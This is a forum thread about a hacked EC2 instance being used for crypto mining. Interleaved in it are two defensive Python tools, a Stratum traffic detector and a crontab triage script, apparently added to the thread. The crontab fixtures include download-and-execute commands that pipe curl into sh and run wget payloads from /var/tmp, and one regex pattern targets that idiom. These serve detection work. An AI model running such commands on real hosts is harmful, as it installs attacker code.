My EC2 instance was hacked. Whom do I contact to share details?

Deutsche Bank k1hgk
May 15, 2018 27 Comments

I want to share logs and some traces.

comments

TOP 27 Comments
  • Amazon / Eng Iomnbvc
    Jeff@amazon.com
    May 15, 2018 3
    • Oscar / Eng dumb|dumb
      My name is Jeff.
      May 15, 2018
    • Amazon Jeff Bеzоs
      How can I be of service, Sir?
      May 15, 2018
    • New / Eng CECA
      Wow, so customer centric Jeff
      May 15, 2018
  • Amazon Jeff Bеzоs
    Please enter your credit card account number below so that my Engineer can pull up your data account numbers and investigate this Very unfortunate accident. Thank you, Sir!
    May 15, 2018 1
    • Deutsche Bank k1hgk
      OP
      Here you go Jeff. 4112 7358 0521 9252. If you have further questions pm me.
      May 16, 2018
  • Daimler BigInJapаn
    911
    May 15, 2018 0
  • Google / Eng Abfxs
    Did you upload your private keys to GitHub? Try using gcloud; it has better security features, like no SSH key management.
    May 15, 2018 5
    • Oscar / Eng dumb|dumb
      How do you log in?
      May 15, 2018
    • Google / Eng Abfxs
      https://cloud.google.com/sdk/gcloud/reference/compute/ssh

      Basically the CLI has a wrapper over ssh which handles public/private keys per project. When you update the key pair, it automatically updates all VMs.
      May 15, 2018
    • Microsoft Mutex07
      What if you have to share keys with a teammate?
      May 15, 2018
    • Deutsche Bank k1hgk
      OP
      No, I have some GitHub repos but no keys over there.
      May 16, 2018
    • Deutsche Bank k1hgk
      OP
      Well, it's my small side project and I am the only person working on it.
      May 16, 2018
  • Deutsche Bank k1hgk
    OP
    I have taken a tcpdump and can clearly see calls going back and forth between the EC2 instance and some Chinese, German and Russian servers. Those are all JSON-RPC with the Stratum TCP protocol. Seems like they were looking for some computing resource for generating hashes for cryptocurrency.
    May 16, 2018 1
    • Oscar / Eng dumb|dumb
      Typical hack.
      May 16, 2018
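The traffic the OP describes above (newline-delimited JSON-RPC with Stratum method names) can be confirmed mechanically rather than by eyeballing a tcpdump. The following is an added example, not code from the thread or from AWS: it walks one direction of a reassembled TCP stream, parses each line as JSON-RPC, and flags the method names of the two common Stratum dialects (the Bitcoin-derived `mining.*` family used by cpuminer/cgminer/ccminer and the CryptoNote dialect used by xmrig). The sample payloads, wallet strings and pool hostnames are constructed placeholders; the conclusive-method heuristic is an assumption, not a standard.

```python
"""Flag Stratum mining JSON-RPC in captured TCP payload text.

Stratum is newline-delimited JSON-RPC over a plain TCP socket. Pools often
listen on 3333/4444/5555/14444, but any port works, so match on the method
names (which are distinctive) rather than on the port.
"""
import json
from dataclasses import dataclass, field

# Method names of the two common dialects: the Bitcoin-derived "mining.*"
# family (cpuminer, cgminer, ccminer) and the CryptoNote/Monero dialect used
# by xmrig (login/job/submit/keepalived).
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.notify",
    "mining.set_difficulty", "mining.submit", "mining.extranonce.subscribe",
    "login", "job", "submit", "keepalived",
}
# Assumed heuristic: a lone "submit" or "keepalived" could belong to some
# other JSON-RPC service; these methods on their own are enough to call it mining.
CONCLUSIVE = {"mining.subscribe", "mining.authorize", "mining.notify", "login", "job"}


@dataclass
class StratumFindings:
    methods: set = field(default_factory=set)
    logins: set = field(default_factory=set)   # wallet/worker strings
    agents: set = field(default_factory=set)   # miner software banners
    malformed: int = 0                         # non-empty lines that were not JSON objects

    @property
    def is_mining(self) -> bool:
        return bool(self.methods & CONCLUSIVE)


def analyse_stream(payload: str) -> StratumFindings:
    """Walk one direction of a reassembled TCP stream, one JSON object per line."""
    f = StratumFindings()
    for line in payload.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            msg = json.loads(line)
        except json.JSONDecodeError:
            msg = None
        if not isinstance(msg, dict):
            f.malformed += 1
            continue
        method = msg.get("method")
        params = msg.get("params")
        if method in STRATUM_METHODS:
            f.methods.add(method)
        # Pull out the indicators worth pivoting on: the pool account the
        # miner authenticates with, and the miner software it announces.
        if method == "mining.authorize" and isinstance(params, list) and params:
            f.logins.add(str(params[0]))
        elif method == "mining.subscribe" and isinstance(params, list) and params:
            f.agents.add(str(params[0]))
        elif method == "login" and isinstance(params, dict):
            if "login" in params:
                f.logins.add(str(params["login"]))
            if "agent" in params:
                f.agents.add(str(params["agent"]))
    return f


# Constructed samples (not taken from the OP's capture). Wallets and job
# fields are placeholders.
SAMPLE_CPUMINER = "\n".join([
    '{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}',
    '{"id": 2, "method": "mining.authorize", "params": ["WALLET_PLACEHOLDER.ec2-worker", "x"]}',
    '{"id": null, "method": "mining.notify", "params": ["job1", "00", "00", "00", [], "20000000", "1a0ff0ff", "5afc0000", true]}',
    '{"id": 3, "method": "mining.submit", "params": ["WALLET_PLACEHOLDER.ec2-worker", "job1", "0000", "5afc0001", "deadbeef"]}',
])
SAMPLE_XMRIG = "\n".join([
    '{"id": 1, "jsonrpc": "2.0", "method": "login", "params": {"login": "MONERO_WALLET_PLACEHOLDER", "pass": "x", "agent": "XMRig/2.6.1"}}',
    "220 not json at all",
    '{"jsonrpc": "2.0", "method": "job", "params": {"blob": "0707", "job_id": "abc", "target": "b88d0600"}}',
])
# Ordinary JSON-RPC that must not be flagged.
SAMPLE_BENIGN = '{"jsonrpc": "2.0", "method": "eth_blockNumber", "params": [], "id": 1}\n'


if __name__ == "__main__":
    for name, payload in (("cpuminer", SAMPLE_CPUMINER), ("xmrig", SAMPLE_XMRIG), ("benign", SAMPLE_BENIGN)):
        f = analyse_stream(payload)
        print(f"{name}: mining={f.is_mining} methods={sorted(f.methods)} "
              f"logins={sorted(f.logins)} agents={sorted(f.agents)} malformed={f.malformed}")
```

To run it against a real capture, reassemble each TCP connection first (for instance the per-flow files `tcpflow -r capture.pcap` writes out) and feed the client-to-server side to `analyse_stream`; the wallet/worker string it recovers is the indicator to search for across other hosts and in threat-intel feeds.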
  • Deutsche Bank k1hgk
    OP
    The person who hacked my account installed some jobs under cron and was executing some programs under the /var/tmp folder with tomcat user permissions. They were executing some shell script by making an HTTP call. Wow, seems like my server was accessed from every part of the world.
    May 16, 2018 3
    • Oscar / Eng dumb|dumb
      Either your kernel was extremely vulnerable or you had a messed up permission setup. On a serious note, you still have basic support if you are not a business user. Just shut off the machine and tell them what happened. Someone will reply to you.
      May 16, 2018
    • Facebook / Creative
      So entry point was your tomcat? Did they get root or they stayed tomcat?
      May 16, 2018
    • Deutsche Bank k1hgk
      OP
      I don't know if the entry point was Tomcat, but I suspect it to be the entry point. It was running as the tomcat user. The other entry is the yum packages which I was trying for Let's Encrypt SSL. Other than these there was nothing on the box.
      May 16, 2018
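The persistence the OP describes above (cron jobs running as the tomcat user, executing out of /var/tmp and fetching a script over HTTP) is a pattern that can be triaged from the crontab files alone. This is an added example, not code from the thread or from AWS: it parses system and per-user crontab text collected from the box (so it runs offline against a disk image) and reports jobs that run from world-writable or hidden paths or that download and execute in one step, noting when the job runs as a service account. The sample crontabs, hostnames and paths are constructed; the list of service accounts and the suspicion rules are assumptions a responder would tune.

```python
"""Triage crontab contents for miner-style persistence: jobs that run as a
service account and execute from /var/tmp or fetch a script over HTTP.

Works on crontab text already collected from the box (/etc/crontab,
/etc/cron.d/*, /var/spool/cron/<user>), so it can run offline on an image.
"""
import re
from dataclasses import dataclass

# Directories any local user can write to; legitimate jobs rarely run from them.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Download-and-execute idioms: fetcher piped into a shell, or sh <(curl ...).
FETCH_EXEC = re.compile(
    r"(?:curl|wget)\b[^|;&]*\|\s*(?:ba|da|z|k)?sh\b|(?:ba)?sh\s+<\(\s*(?:curl|wget)\b"
)
URL = re.compile(r"https?://[^\s'\"]+")
HIDDEN_PATH = re.compile(r"/\.[A-Za-z0-9_-]+")          # /var/tmp/.x, ~/.cache/...
# Assumed list of accounts that should not normally own cron jobs.
SERVICE_ACCOUNTS = {"tomcat", "www-data", "apache", "nginx", "nobody", "daemon"}


@dataclass
class CronFinding:
    source: str
    user: str
    command: str
    reasons: list


def parse_crontab(text: str, system: bool, owner: str = "root"):
    """Yield (user, command) per job line.

    System crontabs (/etc/crontab, /etc/cron.d/*) have a user field between
    the schedule and the command; per-user spool files do not, so the owner
    of the file is the user. "@reboot"-style schedules are a single field.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue                       # blank, comment, or VAR=value
        n_time = 1 if line.startswith("@") else 5
        n_fields = n_time + (2 if system else 1)
        parts = line.split(None, n_fields - 1)
        if len(parts) < n_fields:
            continue                       # truncated line, nothing to run
        user = parts[n_time] if system else owner
        yield user, parts[-1]


def suspicious_reasons(command: str) -> list:
    reasons = []
    if any(d in command for d in WRITABLE_DIRS):
        reasons.append("executes from a world-writable directory")
    if HIDDEN_PATH.search(command):
        reasons.append("references a dot-prefixed (hidden) path")
    if FETCH_EXEC.search(command):
        reasons.append("downloads and executes a script in one step")
    elif URL.search(command):
        reasons.append("fetches a URL")
    return reasons


def triage(sources) -> list:
    """sources: iterable of (path, text, is_system_crontab, owner)."""
    findings = []
    for path, text, system, owner in sources:
        for user, command in parse_crontab(text, system, owner):
            reasons = suspicious_reasons(command)
            if not reasons:
                continue
            if user in SERVICE_ACCOUNTS:
                reasons.append(f"runs as service account {user!r}")
            findings.append(CronFinding(path, user, command, reasons))
    return findings


# Constructed samples. The system crontab is a stock Debian-style one; the
# tomcat spool file imitates what a miner dropper leaves behind (hostname
# and paths are placeholders, not real indicators).
SAMPLE_SYSTEM = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 3     * * *   root    /usr/bin/certbot renew --quiet
"""
SAMPLE_TOMCAT = """\
*/10 * * * * /var/tmp/.x/run.sh >/dev/null 2>&1
@reboot curl -fsSL http://pool.invalid/x.sh | sh
* * * * * /usr/bin/wget -q -O /var/tmp/.upd http://pool.invalid/u && chmod +x /var/tmp/.upd && /var/tmp/.upd
"""
SOURCES = [
    ("/etc/crontab", SAMPLE_SYSTEM, True, "root"),
    ("/var/spool/cron/tomcat", SAMPLE_TOMCAT, False, "tomcat"),
]

if __name__ == "__main__":
    for f in triage(SOURCES):
        print(f"{f.source} [{f.user}] {f.command}\n    " + "; ".join(f.reasons))
```

The stock system crontab produces no findings; every line of the tomcat spool file does. In a real response, collect the crontab files with the instance stopped (snapshot the EBS volume and mount it elsewhere) rather than running anything on the compromised host, and treat the fetched URLs and the /var/tmp paths as the next indicators to pull.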
  • Amazon Safeway
    Did the EC2 team go through Infosec approval?
    May 16, 2018 1
    • Amazon / Eng Hooliganss
      Lol yes.
      May 16, 2018
  • Amazon / Eng Hooliganss
    Lol, how was it hacked? And what kind of EC2 (reserved, spot, on-demand, etc.)?
    May 15, 2018 1
    • Deutsche Bank k1hgk
      OP
      I have a basic instance for which I pay roughly 25 USD a month. I don't know how they gained access, but I feel they might have got root access either via some yum packages or via Tomcat. I did try Let's Encrypt stuff in the last 4 days and that is the only thing I recollect.
      May 16, 2018
  • Deutsche Bank k1hgk
    OP
    Damn it, I get more bot traffic than user traffic nowadays. I have taken the infrastructure offline. Maybe I will patch up everything correctly and then start fresh. Will raise a ticket with Amazon this evening.
    May 16, 2018 0
  • Deutsche Bank k1hgk
    OP
    Actually, I have the keys stored in my Dropbox folder and I use PuTTY with keys to log in.
    May 16, 2018 0
  • Verizon cicdaws
    Hacked how? Did you enable password auth and set up a stupid password?
    May 15, 2018 0
  • Oscar / Eng dumb|dumb
    Next time use spot instances.
    May 15, 2018 0
